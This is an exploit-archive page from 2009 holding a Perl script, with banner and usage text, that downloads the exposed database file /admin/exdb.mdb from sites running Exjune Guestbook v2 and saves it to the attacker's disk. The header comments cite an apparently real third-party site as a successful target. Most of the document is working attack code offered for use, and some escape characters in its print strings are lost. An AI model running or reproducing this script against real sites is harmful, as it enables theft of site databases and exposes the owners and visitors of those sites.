[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Exjune Guestbook v2 Remote Database Disclosure Exploit
# Published : 2009-04-09
# Author : AlpHaNiX
# Previous Title : Geeklog <= 1.5.2 SEC_authenticate() SQL Injection Exploit
# Next Title : BackendCMS 5.0 (main.asp id) SQL Injection Vulnerability


#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
###########
# Vulnerable :
# database path : /admin/exdb.mdb
##########
# Real Life Example :
#
#
# OOO  OOO           OO    OO        OO
#  OO   O             O     O         O
#  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO
#  O  O O   O   O     O     O        OOO    OO     OOOOOO       O
#  O   OO   O   O     O     O       O   O   O      O       OOOOOO
# OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO
#
#
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX
#
#
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
##########
# Greetz for Zigma/Djek/unary/r1z


use lwp::UserAgent;

system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : n    ./exploit http://site.comn";exit();}
if ($ARGV[0] =~ /http:/// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "nnnn OOO  OOO           OO    OO        OOn" ;
print "  OO   O             O     O         On" ;
print "  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOOn" ;
print "  O  O O   O   O     O     O        OOO    OO     OOOOOO       On" ;
print "  O   OO   O   O     O     O       O   O   O      O       OOOOOOn" ;
print " OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OOn" ;
print "nn[-] Exjune Guestbook v2 Remote Database Disclosure Exploitn";
print "[-] Found & Exploited By AlpHaNiX nnn";
print "[!] Exploiting $site ....n";
my $site      = $ARGV[0] ;
my $target    = $site."/admin/exdb.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request   = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();}
else {print "[!] Exploiting $site Failed !n[!] ".$request->status_line."n";exit();}

# www.Syue.com [2009-04-09]